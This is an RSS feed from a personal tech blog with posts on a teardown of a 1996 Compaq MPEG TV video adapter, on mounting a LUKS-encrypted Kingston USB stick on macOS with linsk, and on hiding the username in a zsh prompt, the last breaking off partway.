<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title></title>
		<description>Happy reading!</description>		
		<link>https://bitwornhat.com</link>
		<atom:link href="https://bitwornhat.com/feed.xml" rel="self" type="application/rss+xml" />
		
			<item>
				<title>Compaq LTE MPEG TV Video Adapter</title>
				<description>&lt;p&gt;Exactly 8 years ago I came across this Compaq MPEG TV Video adapter on a local auction site where I bought it for a few bucks. Much later it turned out it was quite a rare piece of retro hardware. It plugs at the back of the &lt;a href=&quot;https://en.wikipedia.org/wiki/Compaq_LTE_5000_series&quot;&gt;Compaq LTE&lt;/a&gt; docking station (5000 series) to their proprietary mpeg connector, but I haven’t had a chance to test it yet.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq1_small.jpg&quot; alt=&quot;Top view of the Compaq MPEG TV Video adapter&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq2_small.jpg&quot; alt=&quot;Angled view of the Compaq MPEG TV Video adapter showing its black housing and connector&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq3_small.jpg&quot; alt=&quot;Bottom view of the Compaq adapter showing the specification sticker with 18V 2.6A power rating&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;(full size: &lt;a href=&quot;/assets/images/2025-12-22/compaq1.jpg&quot;&gt;image 1&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq2.jpg&quot;&gt;image 2&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq3.jpg&quot;&gt;image 3&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;There’s a Compaq logo at the top and a sticker on the bottom. We can learn it’s powered by 18V (up to 2.6A). It has a power port on the side (positive inside, negative outside), but once the adapter is plugged into a docking station there’s no way to use it, which I assume means it may work standalone? 🤔 In the &lt;a href=&quot;/assets/files/2025-12-22/Compaq_LTE_5000_Family_Maintenance_and_Service_Guide.pdf&quot;&gt;manual&lt;/a&gt; we can find a mention of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;MPEG AC Adapter&lt;/code&gt; (part number &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;241909-001&lt;/code&gt;, page 95-97, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Chapter 3.9 Computer Optional Accessories&lt;/code&gt;), but this may be even harder to find than the mpeg adapter itself.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq4_small.jpg&quot; alt=&quot;Side view of the adapter showing the power port with positive inside, negative outside polarity&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq5_small.jpg&quot; alt=&quot;Side view of the adapter&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;(full size: &lt;a href=&quot;/assets/images/2025-12-22/compaq4.jpg&quot;&gt;image 4&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq5.jpg&quot;&gt;image 5&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;What’s on the back of the adapter? It has a few &lt;em&gt;out&lt;/em&gt; ports on the left like composite, S-Video, plus two jacks, in and out. On the right side there’s the VGA port for external monitor, video and S-Video inputs and a keyboard or mouse PS2 port.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq6_small.jpg&quot; alt=&quot;Rear panel showing VGA port, video and S-Video inputs, and PS2 port on the right side&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq7_small.jpg&quot; alt=&quot;Rear panel of the adapter showing composite, S-Video output ports and audio jacks on the left side&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;(full size: &lt;a href=&quot;/assets/images/2025-12-22/compaq6.jpg&quot;&gt;image 6&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq7.jpg&quot;&gt;image 7&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The docking station is already equipped with two PS2 connectors for keyboard/mouse, VGA and headphone/speaker jack, so I imagine it had little value for an average user.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq17_small.jpg&quot; alt=&quot;Compaq LTE 5000 series docking station rear panel with adapter plugged in&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq18_small.jpg&quot; alt=&quot;Bottom view of the Compaq docking station with its proprietary MPEG connector visible&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;(full size: &lt;a href=&quot;/assets/images/2025-12-22/compaq17.jpg&quot;&gt;image 17&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq18.jpg&quot;&gt;image 18&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;What else can we learn from the &lt;a href=&quot;/assets/files/2025-12-22/Compaq_LTE_5000_Family_Maintenance_and_Service_Guide.pdf&quot;&gt;manual&lt;/a&gt;?&lt;/p&gt;

&lt;div class=&quot;language-text highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;The MPEG and TV Video Adapter option is supported with the computer and both expansion bases. This option provides an MPEG decoder for high quality digital video playback with Windows scaling and interleaved stereo audio, S-Video I/O for laser disc quality playback video, and composite video supporting the NTSC/PAL formats.

[...]

The graphics controller also supports display of real-time video from the MPEG and TV Video Adapter at a rate of 30 frames per second (fps). It provides the capability to overlay the video in a Windows screen.

[...]

The computer supports an interface to an MPEG and TV Video Adapter that attaches to the rear of the computer. The adapter provides up to 30 fps of live video or MPEG video to the graphics controller for display on the LCD, a CRT, or a television. The MPEG and TV Video Adapter and CD-ROM drive can be used simultaneously.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;And below are some pictures after the disassembly. The case is held by 5 screws, 2 hidden behind anti-slip rubber. We can see the manufacture date (May 22 1996) and a few chips:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;Philips SAA 7100 WP&lt;/strong&gt; - some kind of Digital Tuner Decoder Sat (based on a newer &lt;a href=&quot;https://tvsat.com.pl/PDF/S/saa7500_ph.pdf&quot;&gt;SAA 7500&lt;/a&gt; version)&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Auravision VXP501 CPQ&lt;/strong&gt; - video processing&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;C-Cube CL-480-T128 MV FO JAPAN 9620&lt;/strong&gt; - possibly the mpeg codec decode chip made by C-Cube Microsystems (later known as LSI Logic and then &lt;strong&gt;Broadcom&lt;/strong&gt;). 9620 is likely date code indicating 20th week of 1996 (May 13-19th)&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;CHRONTEL CH7001 AM199B&lt;/strong&gt; - VGA to NTSC/PAL Encoder (&lt;a href=&quot;/assets/files/2025-12-22/CH7001C.PDF&quot;&gt;datasheet&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq8_small.jpg&quot; alt=&quot;Disassembled Compaq adapter showing the opened case with manufacture date visible&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq9_small.jpg&quot; alt=&quot;Disassembled Compaq adapter showing the opened case PCB&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq10_small.jpg&quot; alt=&quot;Compaq adapter metal shield&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq11_small.jpg&quot; alt=&quot;Overall view of the internal PCB with all major chips and components visible&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq12_small.jpg&quot; alt=&quot;Close-up of the C-Cube chip&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq13_small.jpg&quot; alt=&quot;Close-up of the C-Cube and CHRONTEL CH7001 chip&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq14_small.jpg&quot; alt=&quot;Close-up of the Philips chip&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq15_small.jpg&quot; alt=&quot;Close-up of the Auravision chip&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2025-12-22/compaq16_small.jpg&quot; alt=&quot;Manually soldered wire&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;(full size: &lt;a href=&quot;/assets/images/2025-12-22/compaq8.jpg&quot;&gt;image 8&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq9.jpg&quot;&gt;image 9&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq10.jpg&quot;&gt;image 10&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq11.jpg&quot;&gt;image 11&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq12.jpg&quot;&gt;image 12&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq13.jpg&quot;&gt;image 13&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq14.jpg&quot;&gt;image 14&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq15.jpg&quot;&gt;image 15&lt;/a&gt; &lt;a href=&quot;/assets/images/2025-12-22/compaq16.jpg&quot;&gt;image 16&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Mon, 22 Dec 2025 18:00:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/compaq-mpeg-tv-video-adapter</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/compaq-mpeg-tv-video-adapter</guid>
			</item>
		
			<item>
				<title>Mounting encrypted LUKS kingston pendrive on macos</title>
				<description>&lt;p&gt;&lt;a href=&quot;#tldr&quot;&gt;TLDR&lt;/a&gt; 😄&lt;/p&gt;

&lt;p&gt;If you read the previous post you should already know I switched from linux to macos. And I learned a new thing! Back in the day I bought a barely used 8GB &lt;a href=&quot;https://media.kingston.com/support/downloads/dt2000_UserManual.pdf&quot;&gt;Kingston Data Traveler (DT) 2000&lt;/a&gt;, very cheaply, to keep my most important files safe and portable. It comes with the build-in keypad, you type your password, plug the stick in and it just works, you can now access you files. It’ll wipe your data if you fail to type your password 10 times. I used it for a while, but was bothered by a thought. Would you trust Kingston or any other company with a device they consider &lt;em&gt;secure&lt;/em&gt; which you can’t even update and their soft isn’t open-source? Probably yes, because you’re not &lt;a href=&quot;https://en.wikipedia.org/wiki/Edward_Snowden&quot;&gt;Snowden&lt;/a&gt; 😛 Should be more than enough to keep you files hidden from your grandmother! Btw, don’t underestimate your granny 😄 It wasn’t enough for my brain though, it was still poking me every now and then, annoying! In the end, I wiped the whole pendrive and encrypted it. I don’t remember what I used, probably something which was available via my gui (did I use Ubuntu back in the day?? 😱). I imagine it could be some kind of &lt;em&gt;encrypt&lt;/em&gt; checkbox. Fancy encryption FTW. It was enough for my brain to let go 😄 Today, I faced a small issue. I realized that &lt;a href=&quot;https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup&quot;&gt;LUKS&lt;/a&gt; is not supported by macos. They probably have their own &lt;em&gt;secure&lt;/em&gt; tools, which I think I trust even less than the Kingston &lt;em&gt;hardware-based, Full Disk AES 256-bit data encryption in XTS mode&lt;/em&gt;. Fancy marketing. Anyway, I already have encrypted partition inside a hardware encrypted USB stick, and the issue, I can’t access my data on macos. Googling time!&lt;/p&gt;

&lt;p&gt;I stumbled upon some very neat tool called &lt;a href=&quot;https://github.com/AlexSSD7/linsk/tree/master&quot;&gt;linsk&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;Linsk is a utility that allows you to access Linux-native file system infrastructure, including LVM and LUKS on Windows and macOS.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;I decided to give it a go. I followed the &lt;a href=&quot;https://github.com/AlexSSD7/linsk/blob/master/INSTALL_MACOS.md&quot;&gt;install manual&lt;/a&gt;, added missing &lt;a href=&quot;https://www.qemu.org/docs/master/about/index.html&quot;&gt;qemu&lt;/a&gt; and &lt;a href=&quot;https://go.dev/doc/install&quot;&gt;golang&lt;/a&gt; as described in the readme and, finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;linsk&lt;/code&gt; itself. Time for the &lt;a href=&quot;https://github.com/AlexSSD7/linsk/blob/master/USAGE_MACOS.md#linsk-macos-usage-instructions&quot;&gt;macos manual&lt;/a&gt;. Oh, and don’t forget to &lt;a href=&quot;https://stackoverflow.com/a/57217841&quot;&gt;add golang bin folder to your shell PATH&lt;/a&gt;.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Build&lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;linsk build
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;ol&gt;
  &lt;li&gt;Connect the encrypted usb stick, macos will show a waring alert box to ask if you want to mount it. Don’t do that! Hit &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ignore&lt;/code&gt;. You can read console warning for more info later&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image-3.png&quot; alt=&quot;macos alert&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Run the below command to find the path. In my case it’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev:/dev/disk4&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;diskutil list
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image.png&quot; alt=&quot;diskutil list command result&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Next we list what’s inside the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;disk4&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;sudo &lt;/span&gt;linsk &lt;span class=&quot;nb&quot;&gt;ls &lt;/span&gt;dev:/dev/disk4
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image-2.png&quot; alt=&quot;links ls command result&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And yes, you’ll be prompted again. Annoying, but we can live with it. As you can see it says &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crypto_LUKS&lt;/code&gt; which means the whole pendrive is behind our encryption wall. It’s mentioned under &lt;a href=&quot;https://github.com/AlexSSD7/linsk/blob/master/USAGE_MACOS.md#use-an-lvm-volume-group-contained-inside-a-luks-volume&quot;&gt;advanced&lt;/a&gt; section.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;We need to run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ls&lt;/code&gt; on our &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;vdb1&lt;/code&gt; with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--luks-container&lt;/code&gt; flag&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image-4.png&quot; alt=&quot;links ls command with container flag result&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So close, we can see the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cryptcontainer&lt;/code&gt;, the file system and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r&lt;/code&gt;, probably &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;read&lt;/code&gt; flag.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Run! In the docs you find a magic &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mapper&lt;/code&gt; keyword in command examples. I expect this is what we need to add to our last parameter which is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cryptcontainer&lt;/code&gt;?&lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;sudo &lt;/span&gt;linsk run dev:/dev/disk4 &lt;span class=&quot;nt&quot;&gt;--luks-container&lt;/span&gt; vdb1 mapper/cryptcontainer
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image-5.png&quot; alt=&quot;linsk run command result&quot; /&gt;&lt;/p&gt;

&lt;p&gt;That’s it! Of course after you successfully typed three passwords, first on the stick, second for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo&lt;/code&gt; and third one for your encrypted &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;vdb&lt;/code&gt;. And you guessed correctly, I also encrypted few files separately, so it would be 4! 🤯
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;linsk&lt;/code&gt; hosts the &lt;a href=&quot;https://en.wikipedia.org/wiki/Apple_Filing_Protocol&quot;&gt;AFP&lt;/a&gt; server for you. This is the bridge between linux and macos we needed.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Now, open this &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Finder&lt;/code&gt; and hit &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Go -&amp;gt; Connect to server&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image-6.png&quot; alt=&quot;finder login to aft login window&quot; width=&quot;400&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Enjoy!&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-14/image-7.png&quot; alt=&quot;finder results window&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahh, and the last one. Don’t forget to safely unmount the drive! I got an led which flashes during the save/read process. I suppose you don’t want to break &lt;em&gt;some bytes&lt;/em&gt;, especially, during the save process on double encrypted drive ☠️&lt;/p&gt;

&lt;h4 id=&quot;-tldr&quot;&gt;&lt;a id=&quot;tldr&quot;&gt;&lt;/a&gt; TLDR&lt;/h4&gt;

&lt;p&gt;Install &lt;a href=&quot;https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup&quot;&gt;luks&lt;/a&gt;, it’s a small VM which hosts an &lt;a href=&quot;https://en.wikipedia.org/wiki/Apple_Filing_Protocol&quot;&gt;AFP&lt;/a&gt; server to access your files. Ignore all macos warnings.&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;diskutil list &lt;span class=&quot;c&quot;&gt;# to grab the disk number&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;sudo &lt;/span&gt;linsk run dev:/dev/disk4 &lt;span class=&quot;nt&quot;&gt;--luks-container&lt;/span&gt; vdb1 mapper/cryptcontainer &lt;span class=&quot;c&quot;&gt;# replace disk4 with your disk number&lt;/span&gt;
&lt;span class=&quot;c&quot;&gt;# command + K to open finder&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Sun, 14 Jan 2024 17:00:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/encrypted-luks-and-macos</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/encrypted-luks-and-macos</guid>
			</item>
		
			<item>
				<title>How to remove username from macos terminal and zsh bira theme cli prompt title</title>
				<description>&lt;p&gt;&lt;a href=&quot;#tldr&quot;&gt;TLDR&lt;/a&gt; below 😄&lt;/p&gt;

&lt;p&gt;It’s a new year, so I decided to try a few new things. I was thinking a lot about switching to macos so I decided it’s finally time to give it a try. I feel sad leaving majaro liniux, I think it’s an amazing distro with everything you may want for your everyday tasks. I’ll keep it on my private laptop though. So, macos for work and manjaro for everything else, it’s been decided 😉&lt;/p&gt;

&lt;p&gt;What I realized after I got a macbook from my company it’s how custom my linux setup was. I promise to write the ultimate manjaro -&amp;gt; macos switching tutorial at some point, but I’m still learning it!&lt;/p&gt;

&lt;p&gt;Today’s post is about small terminal update you may be interested to do for yourself. I use &lt;a href=&quot;https://www.zsh.org/&quot;&gt;zsh&lt;/a&gt; combined with &lt;a href=&quot;https://github.com/ohmyzsh/ohmyzsh&quot;&gt;ohmyzsh&lt;/a&gt; and only &lt;a href=&quot;https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git&quot;&gt;git&lt;/a&gt; plugin enabled. My favorite theme is &lt;a href=&quot;https://github.com/ohmyzsh/ohmyzsh/wiki/Themes#bira&quot;&gt;bira&lt;/a&gt; one of the default ones. I got my laptop with already configured username which includes my name and surname. I like to work in a coffee shops or cowork spaces and prefer not to have my details displayed on every cli command I type. C’mon, just look at this 🙃&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-7.png&quot; alt=&quot;Terminal screenshot&quot; width=&quot;500&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Privacy first man! This post should be useful even if you want do make a different modification. I always try to include every step, especially the pointless ones, and as many useful links as possible 🙂&lt;/p&gt;

&lt;p&gt;Spoiler alert: we would need to update the window title and the cli prompt separately. I start with the latter, because that’s what I found first 😛&lt;/p&gt;

&lt;p&gt;Ok, after some googling here and there, I found &lt;a href=&quot;https://www.cyberciti.biz/faq/bash-shell-change-the-color-of-my-shell-prompt-under-linux-or-unix/&quot;&gt;this&lt;/a&gt; article. It mentions the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$PS1&lt;/code&gt; variable. This is the value if you &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;echo&lt;/code&gt; it on the bare &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bash&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-2.png&quot; alt=&quot;ps1 variable in bash&quot; width=&quot;220&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And we’ve got smth like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;\s-\v\$&lt;/code&gt;. You can find many more properties, like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;\u&lt;/code&gt; - which is username, or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;\H&lt;/code&gt; - hour. If you want to apply some settings for the current terminal session then use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;export PS1=&quot;your_config&quot;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-1.png&quot; alt=&quot;export PS1 variable result&quot; width=&quot;450&quot; /&gt;&lt;/p&gt;

